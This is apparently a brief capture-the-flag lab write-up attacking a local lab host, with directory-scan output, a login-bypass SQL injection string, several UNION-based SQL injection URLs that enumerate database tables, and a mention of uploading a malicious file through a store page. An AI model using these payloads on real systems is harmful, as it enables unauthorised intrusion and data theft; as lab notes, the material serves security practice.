http

[00:17:57] 301 -  316B  - /admin  ->  http://192.168.74.111/admin/
[00:17:57] 200 -    3KB - /admin/?/login
[00:17:57] 200 -    3KB - /admin/
[00:17:57] 200 -    3KB - /admin/index.php
[00:17:57] 302 -   24KB - /admin/home.php  ->  http://192.168.74.111/admin/index.php
[00:18:02] 200 -    0B  - /checklogin.php
[00:18:03] 302 -   10KB - /dashboard.php  ->  http://192.168.74.111/index.php
[00:18:07] 200 -    2KB - /header.php
[00:18:07] 200 -    3KB - /index.php
[00:18:08] 200 -   11KB - /index.html
[00:18:08] 200 -    3KB - /index.php/login/
[00:18:10] 200 -   75B  - /logout.php
[00:18:14] 302 -    7KB - /profile.php  ->  http://192.168.74.111/index.php
[00:18:15] 200 -   14B  - /robots.txt
[00:18:16] 301 -  317B  - /secret  ->  http://192.168.74.111/secret/
[00:18:16] 200 -  108B  - /secret/
[00:18:18] 301 -  316B  - /store  ->  http://192.168.74.111/store/

CRM

got in using admin'-- -

SQL injection vuln found

returns the correct page.

which means we can extract data from here.

played around and found a position I could get data from.

http://192.168.74.111/store/book.php?bookisbn=%27UNION%20SELECT%20NULL,%20NULL,%20table_name,%20NULL,%20NULL,%20NULL,%20NULL%20FROM%20information_schema.tables%20--%20-

ADMINISTRABLE_ROLE_AUTHORIZATIONS table found 

http://192.168.74.111/store/book.php?bookisbn=%27UNION+SELECT+NULL%2C+NULL%2C+column_name%2C+NULL%2CNULL%2C+NULL%2C+NULL+FROM+information_schema.columns+WHERE+table_name+%3D+%22ADMINISTRABLE_ROLE_AUTHORIZATIONS%22--+-

GRANTEE

http://192.168.74.111/store/book.php?bookisbn='UNION SELECT NULL, NULL, GRANTEE, NULL, NULL, NULL, NULL FROM "ADMINISTRABLE_ROLE_AUTHORIZATIONS"-- -

so this was a rabit hole...

There was an uploadable place in store --> uploaded a malicious stuff there and accessed through img/

PreviousfunboxNextBBSCute

Last updated